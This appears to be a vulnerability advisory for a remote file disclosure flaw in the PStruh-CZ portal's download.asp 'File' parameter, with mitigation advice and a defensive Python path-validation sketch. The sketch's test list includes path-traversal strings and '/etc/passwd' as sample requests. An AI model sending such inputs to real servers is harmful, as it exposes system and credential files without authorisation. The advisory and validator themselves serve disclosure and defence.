vendor: PStruh-CZ
by: Dj7xpl
N/A
CVSS
N/A
Remote File Disclosure Vulnerability
CWE
Product Name: PStruh-CZ
Affected Version From: 1.3
Affected Version To: 1.5
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
PStruh-CZ Remote File Disclosure Vulnerability
The PStruh-CZ portal is affected by a remote file disclosure vulnerability. By manipulating the 'File' parameter of the 'download.asp' script, an attacker can disclose sensitive files on the server. In the provided example, an attacker can download the '/etc/passwd' file.
Mitigation:
The vendor should release a patch to address the vulnerability. In the meantime, users should restrict access to the 'download.asp' script or implement proper input validation to prevent file disclosure.
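The input validation recommended above comes down to resolving the requested name to its real path and refusing anything that falls outside the download directory. The sketch below is an added example, not code from PStruh-CZ or the advisory; it is written in Python to show the check itself, and `resolve_download`, `RejectedPath`, the sample values and the directory layout are all hypothetical.

```python
import os
import tempfile

class RejectedPath(Exception):
    """The requested name must not be served."""

def resolve_download(base_dir, requested):
    """Return the real path of `requested` under base_dir, or raise RejectedPath."""
    if not requested or "\x00" in requested:
        raise RejectedPath("empty name or NUL byte")
    # Classic ASP runs on Windows, where "\" is also a separator: normalise first.
    name = requested.replace("\\", "/")
    if name.startswith("/") or name[1:2] == ":":
        raise RejectedPath("absolute path")
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks BEFORE the containment test.
    target = os.path.realpath(os.path.join(base, *name.split("/")))
    if os.path.commonpath([base, target]) != base:
        raise RejectedPath("escapes download directory")
    if not os.path.isfile(target):
        raise RejectedPath("not a regular file")
    return target

# Constructed sample values for the 'File' parameter.
SAMPLES = ["manual.pdf", "../secret.cfg", "..\\secret.cfg",
           "/etc/passwd", "link.cfg", "manual.pdf\x00.txt"]

def demo():
    """Build a throwaway tree and return the verdict for every sample request."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "downloads")
        os.mkdir(base)
        for path, body in ((os.path.join(base, "manual.pdf"), "public"),
                           (os.path.join(root, "secret.cfg"), "private")):
            with open(path, "w") as fh:
                fh.write(body)
        # link.cfg sits inside the download directory but points outside it.
        os.symlink(os.path.join(root, "secret.cfg"), os.path.join(base, "link.cfg"))
        for req in SAMPLES:
            try:
                resolve_download(base, req)
                results[req] = "served"
            except RejectedPath as exc:
                results[req] = "rejected: " + str(exc)
    return results

if __name__ == "__main__":
    for req, verdict in demo().items():
        print(repr(req), "->", verdict)
```

The containment test runs on the resolved path, so a symlink or a backslash-separated traversal is rejected the same way as a plain `../` sequence.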